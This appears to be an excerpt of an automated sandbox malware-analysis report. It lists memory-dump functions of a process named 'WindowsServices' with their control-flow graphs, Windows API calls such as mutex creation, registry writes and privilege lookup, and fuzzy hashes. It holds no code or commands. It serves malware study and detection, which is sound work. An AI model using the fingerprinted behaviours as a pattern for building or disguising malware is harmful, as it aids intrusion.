                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 6eea277e381ea4ad8affc777e94a96437ac7762647bc88a1a10f89399bf0d550
                                                                        • Instruction ID: ce00fcc4f2f44761d46f6e40e555bc22b8aff4726e7a5b6a9cf97bc0fad60060
                                                                        • Opcode Fuzzy Hash: 6eea277e381ea4ad8affc777e94a96437ac7762647bc88a1a10f89399bf0d550
                                                                        • Instruction Fuzzy Hash: F001A2365002049FDB208F05DA88B62FBE0FF48720F28C49ADE854BB52D375E418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4d30278-4d302a6 1 4d302a8 call 4d30c30 0->1 2 4d302ae-4d302bc 0->2 1->2 3 4d302c2-4d30305 2->3 4 4d303d8-4d303ec 2->4 22 4d303b9-4d303d2 3->22 7 4d303f2-4d3046b 4->7 8 4d30475-4d304c8 4->8 7->8 20 4d304ca 8->20 21 4d304cf-4d304e9 8->21 20->21 25 4d30520-4d30677 21->25 26 4d304eb-4d30515 21->26 22->4 24 4d3030a-4d30316 22->24 27 4d30bbd 24->27 28 4d3031c-4d3034d 24->28 60 4d306ff-4d30bb8 25->60 61 4d3067d-4d306bb 25->61 26->25 30 4d30bc2-4d30c05 27->30 38 4d30390-4d303b3 28->38 39 4d3034f-4d30385 28->39 38->22 38->30 39->38 61->60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 7174581b17db1c86a823dd2d6d8aa7009f38da43073a18ef64bc4d998f444569
                                                                        • Instruction ID: 2643a25b9cf7770e31f5176f5b3984333b778843960310362e5c7483cbd6913d
                                                                        • Opcode Fuzzy Hash: 7174581b17db1c86a823dd2d6d8aa7009f38da43073a18ef64bc4d998f444569
                                                                        • Instruction Fuzzy Hash: 43B17934A01218CFDB15EF74D948BACB7B2BF45309F1084A9D449AB395DB399E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 68 4d30268-4d302a6 70 4d302a8 call 4d30c30 68->70 71 4d302ae-4d302bc 68->71 70->71 72 4d302c2-4d30305 71->72 73 4d303d8-4d303ec 71->73 91 4d303b9-4d303d2 72->91 76 4d303f2-4d3046b 73->76 77 4d30475-4d304c8 73->77 76->77 89 4d304ca 77->89 90 4d304cf-4d304e9 77->90 89->90 94 4d30520-4d30677 90->94 95 4d304eb-4d30515 90->95 91->73 93 4d3030a-4d30316 91->93 96 4d30bbd 93->96 97 4d3031c-4d3034d 93->97 129 4d306ff-4d30bb8 94->129 130 4d3067d-4d306bb 94->130 95->94 99 4d30bc2-4d30c05 96->99 107 4d30390-4d303b3 97->107 108 4d3034f-4d30385 97->108 107->91 107->99 108->107 130->129
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: bba5f3abc16e8a9f8d79f799cc22fa36a67f893f739a0b6156a9dccc3ce04efa
                                                                        • Instruction ID: 004939407502e3ee2900bfd358988e162364f01c73d71234c7117be5589ab17d
                                                                        • Opcode Fuzzy Hash: bba5f3abc16e8a9f8d79f799cc22fa36a67f893f739a0b6156a9dccc3ce04efa
                                                                        • Instruction Fuzzy Hash: 56818974A01218CFDB24EF74C945BADB7B2BF85309F1080A9D409AB394DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 137 4d30392-4d303ad 141 4d303af-4d303b3 137->141 142 4d30bc2-4d30c05 141->142 143 4d303b9-4d303d2 141->143 144 4d3030a-4d30316 143->144 145 4d303d8-4d303ec 143->145 147 4d30bbd 144->147 148 4d3031c-4d3034d 144->148 152 4d303f2-4d3046b 145->152 153 4d30475-4d304c8 145->153 147->142 159 4d30390 148->159 160 4d3034f-4d30385 148->160 152->153 168 4d304ca 153->168 169 4d304cf-4d304e9 153->169 159->141 160->159 168->169 172 4d30520-4d30677 169->172 173 4d304eb-4d30515 169->173 192 4d306ff-4d30bb8 172->192 193 4d3067d-4d306bb 172->193 173->172 193->192
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 5db4e202164e3169145fbcf2ed61faa3d947f6bc44419bc86cb31f8475935ca9
                                                                        • Instruction ID: cf6b7095f6c8aa6a911780f7ffee28f6ab8121be31fb5b4dce6eec567a5e25c4
                                                                        • Opcode Fuzzy Hash: 5db4e202164e3169145fbcf2ed61faa3d947f6bc44419bc86cb31f8475935ca9
                                                                        • Instruction Fuzzy Hash: FE615D74A01218CFDB54EF74C945BECB7B2BF85308F5080A9D409AB695DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 199 4d30429-4d304c8 210 4d304ca 199->210 211 4d304cf-4d304e9 199->211 210->211 213 4d30520-4d30677 211->213 214 4d304eb-4d30515 211->214 233 4d306ff-4d30bb8 213->233 234 4d3067d-4d306bb 213->234 214->213 234->233
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 40335d56aa5003f191a86380497cea29cb25f4825b51235ce5a9eb97860642c3
                                                                        • Instruction ID: 22a9112979be206e5fbdde141aa2d0436a92df36ec8e1da4f7558808f00a965c
                                                                        • Opcode Fuzzy Hash: 40335d56aa5003f191a86380497cea29cb25f4825b51235ce5a9eb97860642c3
                                                                        • Instruction Fuzzy Hash: 24515B34A01218CFDB64EF74C945BECB7B1AF85308F5080E9D009AB694DB34AE89CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 240 b3ab92-b3ac15 244 b3ac17 240->244 245 b3ac1a-b3ac23 240->245 244->245 246 b3ac25 245->246 247 b3ac28-b3ac31 245->247 246->247 248 b3ac33-b3ac57 CreateMutexW 247->248 249 b3ac82-b3ac87 247->249 252 b3ac89-b3ac8e 248->252 253 b3ac59-b3ac7f 248->253 249->248 252->253
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B3AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 8a2adf70abb0ab5e57d5e008043c2758de48b04fa79b82a9b46ba879295b04d2
                                                                        • Instruction ID: db4a68b484601f2f845ec8531cb8d16e1515b2a2cc25e530d95417f4e95b19ec
                                                                        • Opcode Fuzzy Hash: 8a2adf70abb0ab5e57d5e008043c2758de48b04fa79b82a9b46ba879295b04d2
                                                                        • Instruction Fuzzy Hash: 0731AFB55093806FE712CB25DD48B96FFF8EF06314F18849AE9848B292D335A909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 256 b3a361-b3a3cf 259 b3a3d1 256->259 260 b3a3d4-b3a3dd 256->260 259->260 261 b3a3e2-b3a3e8 260->261 262 b3a3df 260->262 263 b3a3ea 261->263 264 b3a3ed-b3a404 261->264 262->261 263->264 266 b3a406-b3a419 RegQueryValueExW 264->266 267 b3a43b-b3a440 264->267 268 b3a442-b3a447 266->268 269 b3a41b-b3a438 266->269 267->266 268->269
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 3293aefcbf040fd96f053a70fa254541c70c8c6032746be73e31e01cc9578834
                                                                        • Instruction ID: d90d006dc7970d12d0534e7c4d50d65c7fc08a06742bbf48e6959e7f0f26f854
                                                                        • Opcode Fuzzy Hash: 3293aefcbf040fd96f053a70fa254541c70c8c6032746be73e31e01cc9578834
                                                                        • Instruction Fuzzy Hash: B23184755047405FD721CF15DC84F92BBF8EF06710F1884DAE9858B692D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 273 b3a462-b3a4c3 276 b3a4c5 273->276 277 b3a4c8-b3a4d4 273->277 276->277 278 b3a4d6 277->278 279 b3a4d9-b3a4f0 277->279 278->279 281 b3a4f2-b3a505 RegSetValueExW 279->281 282 b3a527-b3a52c 279->282 283 b3a507-b3a524 281->283 284 b3a52e-b3a533 281->284 282->281 284->283
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: f420e9f77487205367c29706cb44f07636f07b4b680fd941080d9c1247f93a82
                                                                        • Instruction ID: fc5a53f551e4e3f98ec0b5965ef89fb8bb3396cf8360b5ec174a6765402b1689
                                                                        • Opcode Fuzzy Hash: f420e9f77487205367c29706cb44f07636f07b4b680fd941080d9c1247f93a82
                                                                        • Instruction Fuzzy Hash: AF2192B65043806FD7228F11DD44FA7BFF8DF46710F18849AE985CB652D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 301 b3a67b-b3a6d5 303 b3a6d7 301->303 304 b3a6da-b3a6e0 301->304 303->304 305 b3a6e2 304->305 306 b3a6e5-b3a6ee 304->306 305->306 307 b3a731-b3a736 306->307 308 b3a6f0-b3a6f8 LookupPrivilegeValueW 306->308 307->308 309 b3a6fe-b3a710 308->309 311 b3a712-b3a72e 309->311 312 b3a738-b3a73d 309->312 312->311
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B3A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 59ccae5ff555bd440ac5d6047e6e4c3c5a18536b92dfb4043b342caad3a91428
                                                                        • Instruction ID: b07188366dced1a51eb24b2e22d0933ef2558f5f20dfbde08e76e2ce9b71ef0e
                                                                        • Opcode Fuzzy Hash: 59ccae5ff555bd440ac5d6047e6e4c3c5a18536b92dfb4043b342caad3a91428
                                                                        • Instruction Fuzzy Hash: 042180766093805FD7128B65DC95B92BFF8EF06320F1984DAE984CB6A3D224D909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 314 b3abc6-b3ac15 317 b3ac17 314->317 318 b3ac1a-b3ac23 314->318 317->318 319 b3ac25 318->319 320 b3ac28-b3ac31 318->320 319->320 321 b3ac33-b3ac3b CreateMutexW 320->321 322 b3ac82-b3ac87 320->322 324 b3ac41-b3ac57 321->324 322->321 325 b3ac89-b3ac8e 324->325 326 b3ac59-b3ac7f 324->326 325->326
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B3AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 2fdcc6c9851cc413460f803a471c7588246d2f5022cc6047f6a6e62e4915df34
                                                                        • Instruction ID: c3386db4a1b3531d707b8a909a1a70f1a75d9cc3dfd80ea93e0d7c05f7beaef4
                                                                        • Opcode Fuzzy Hash: 2fdcc6c9851cc413460f803a471c7588246d2f5022cc6047f6a6e62e4915df34
                                                                        • Instruction Fuzzy Hash: 202195755042049FE710DF25DD49B96FBE8EF04314F248499ED848B741D375E909CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 329 b3a392-b3a3cf 331 b3a3d1 329->331 332 b3a3d4-b3a3dd 329->332 331->332 333 b3a3e2-b3a3e8 332->333 334 b3a3df 332->334 335 b3a3ea 333->335 336 b3a3ed-b3a404 333->336 334->333 335->336 338 b3a406-b3a419 RegQueryValueExW 336->338 339 b3a43b-b3a440 336->339 340 b3a442-b3a447 338->340 341 b3a41b-b3a438 338->341 339->338 340->341
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: d1bdea91269028d5a2ba384184e73ef120e9f15afd73edaf226ad40eb8e4cce6
                                                                        • Instruction ID: 275c34f616ccd0c2858801f606c73ebe0cd8de0f65ae1a0aa12d22e7342c0751
                                                                        • Opcode Fuzzy Hash: d1bdea91269028d5a2ba384184e73ef120e9f15afd73edaf226ad40eb8e4cce6
                                                                        • Instruction Fuzzy Hash: A9218EB66002049FE720CE15DD88FA6F7ECEF04710F24849AED858B751D364E809CA76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 345 b3a960-b3a9c4 347 b3aa07-b3aa0c 345->347 348 b3a9c6-b3a9ce FindCloseChangeNotification 345->348 347->348 349 b3a9d4-b3a9e6 348->349 351 b3a9e8-b3aa04 349->351 352 b3aa0e-b3aa13 349->352 352->351
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: bd0c1dc9e1850f5167247ce492d57bdc120c69985ced56f62c3569fd139957fa
                                                                        • Instruction ID: fb4e30c7bc2e6b5ea3beccd2786ba61fea74128b3319901e7e8a5ad6eacdbbae
                                                                        • Opcode Fuzzy Hash: bd0c1dc9e1850f5167247ce492d57bdc120c69985ced56f62c3569fd139957fa
                                                                        • Instruction Fuzzy Hash: 4821DE725093C05FDB128B25DD54B92BFF4AF07324F0984DAEC848F6A3D234A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 354 b3a486-b3a4c3 356 b3a4c5 354->356 357 b3a4c8-b3a4d4 354->357 356->357 358 b3a4d6 357->358 359 b3a4d9-b3a4f0 357->359 358->359 361 b3a4f2-b3a505 RegSetValueExW 359->361 362 b3a527-b3a52c 359->362 363 b3a507-b3a524 361->363 364 b3a52e-b3a533 361->364 362->361 364->363
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 08c650319ae055d194644a1acd8c85fd6a83c0b262d6eb8ed86946a41e41a1d8
                                                                        • Instruction ID: 1d560bd33fcc50c2bb8477551b38da6d44795264f501b0c22c113bc248ba9c74
                                                                        • Opcode Fuzzy Hash: 08c650319ae055d194644a1acd8c85fd6a83c0b262d6eb8ed86946a41e41a1d8
                                                                        • Instruction Fuzzy Hash: B911B4B6500200AFE7218E11DD48F67BBECEF04710F24849AED458AB41D370E808CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 376 b3a6ae-b3a6d5 377 b3a6d7 376->377 378 b3a6da-b3a6e0 376->378 377->378 379 b3a6e2 378->379 380 b3a6e5-b3a6ee 378->380 379->380 381 b3a731-b3a736 380->381 382 b3a6f0-b3a6f8 LookupPrivilegeValueW 380->382 381->382 383 b3a6fe-b3a710 382->383 385 b3a712-b3a72e 383->385 386 b3a738-b3a73d 383->386 386->385
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B3A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: e33192942bc49b3826f4d77447573ff625d6926e9768712d76e34fc902e3de6e
                                                                        • Instruction ID: efda4eb439218544a12e600b20afea91c1efd8da7eb1dd75d217fa0b8b0fcdb9
                                                                        • Opcode Fuzzy Hash: e33192942bc49b3826f4d77447573ff625d6926e9768712d76e34fc902e3de6e
                                                                        • Instruction Fuzzy Hash: FC1188756042408FDB20DF19DD89B56FBE8EF14720F28C4AADD45CB742D374E844DA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 7d0717e9a1d21da7c546166e20f5a2fe2f3e1e066c5083d607d6235f1c2136c2
                                                                        • Instruction ID: 1f7beef741e7adcd890cd875ac6205a76c73d2f7e60d984bafc295145d92c45e
                                                                        • Opcode Fuzzy Hash: 7d0717e9a1d21da7c546166e20f5a2fe2f3e1e066c5083d607d6235f1c2136c2
                                                                        • Instruction Fuzzy Hash: F211C2755093809FDB118F25DC85B52BFE8EF46720F0884EAED858F662D275A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 93a49a5aa920d307d18dda73f7ba438d38c8a4f95b91eab2c13a3442f89c4341
                                                                        • Instruction ID: f5304a4202bfca17956e649a7fdbd32e0dcc416c1c22b6d24b39283816c63e97
                                                                        • Opcode Fuzzy Hash: 93a49a5aa920d307d18dda73f7ba438d38c8a4f95b91eab2c13a3442f89c4341
                                                                        • Instruction Fuzzy Hash: CB01D4766006408FDB10CF15D988752FBE4EF04324F28C4EADD498BB46D274E808CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B3A634
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 526cb0398bb204b5d39c8dc17ea1060213536807a72be7021004a7647af70512
                                                                        • Instruction ID: 9fe09d0e01c3293c63d8fb327490c41acaebb2927fc9104f0e14f9b663f3866d
                                                                        • Opcode Fuzzy Hash: 526cb0398bb204b5d39c8dc17ea1060213536807a72be7021004a7647af70512
                                                                        • Instruction Fuzzy Hash: A201D4756002009FDB108F15D989756FBD4EF04720F28C4EADD458BB56D275E808CE62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 035ac2f6873335a9d197daa9291543687e382e8b5ce68cf4bd4882156ca1d91b
                                                                        • Instruction ID: f5d6c781924ceb68afedb2ddf131b6c3d5dd61b595cb1ec307277947a73edd5a
                                                                        • Opcode Fuzzy Hash: 035ac2f6873335a9d197daa9291543687e382e8b5ce68cf4bd4882156ca1d91b
                                                                        • Instruction Fuzzy Hash: 584150342162468FC704FB3AE78D98977F2AB8120C7848929D1044FF6EDF785A49CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1752933152.0000000000FC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_fc0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28935b3345de2871a2acf0b57b58b44c8e55b501259cfbc487dfa26625d0b10e
                                                                        • Instruction ID: 90508d405424f90f5872f4de0dd2030d13cc65496bd68b39e76c97d67d2cd7e8
                                                                        • Opcode Fuzzy Hash: 28935b3345de2871a2acf0b57b58b44c8e55b501259cfbc487dfa26625d0b10e
                                                                        • Instruction Fuzzy Hash: 2901F7B65097805FCB12CF15DD40863FFB8EF8662070984AFEC498BA52D225B809CB76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b873a65a1f20a80ac42096a310ce02b2d59c57dd96ea2979b6aa9b1cfeafec5
                                                                        • Instruction ID: fb90eba6a3454b7574945c471b966cb3bf013d4510794dfb8234557c8d984c72
                                                                        • Opcode Fuzzy Hash: 4b873a65a1f20a80ac42096a310ce02b2d59c57dd96ea2979b6aa9b1cfeafec5
                                                                        • Instruction Fuzzy Hash: 6701FA9A94F7C15FEB5343306CA55A57F70AD6721479F00EBD0D4CB5A3E5090A0AC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44a64a7351c627bfef7b4cb8b1d26b7f429325e741f3f02dd15fbd8caf3105f7
                                                                        • Instruction ID: c0ac7e4fe1bc35595cf6bbddfc83b850c1b439ac59176ac6a927667c5003b9a6
                                                                        • Opcode Fuzzy Hash: 44a64a7351c627bfef7b4cb8b1d26b7f429325e741f3f02dd15fbd8caf3105f7
                                                                        • Instruction Fuzzy Hash: BDF028317003004BC315777DA8299BA376F9BC1659B44407ED6414B792CF799C4AC3F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1752933152.0000000000FC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_fc0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8022707999cc4b23dc4b845a326a9a71d65aba76dacd6f9b907666af82eb00af
                                                                        • Instruction ID: 34052619a636c29c8f9a483ce14c8c9bcfcbac5f9a5b8dbcc2c5bf10888c51ab
                                                                        • Opcode Fuzzy Hash: 8022707999cc4b23dc4b845a326a9a71d65aba76dacd6f9b907666af82eb00af
                                                                        • Instruction Fuzzy Hash: B9E092BA6046044B9650CF0AEC45452F7D8EB88630B18C07FDC0D8BB01E276B509CAA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750876710.0000000000B32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B32000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b32000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a1c62c1ecf58b0012a06aad5dd275011aea56c3dabf05da4c6417bb02e701d8
                                                                        • Instruction ID: fbc12a602faec10042c9f179f15a936a7e8b1d76831119c9e454bfb68733ad9a
                                                                        • Opcode Fuzzy Hash: 7a1c62c1ecf58b0012a06aad5dd275011aea56c3dabf05da4c6417bb02e701d8
                                                                        • Instruction Fuzzy Hash: 26D05E792056C14FD3169B1CD2A9F9537D4AB55714F5A44F9A8008B763C768E981D600
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

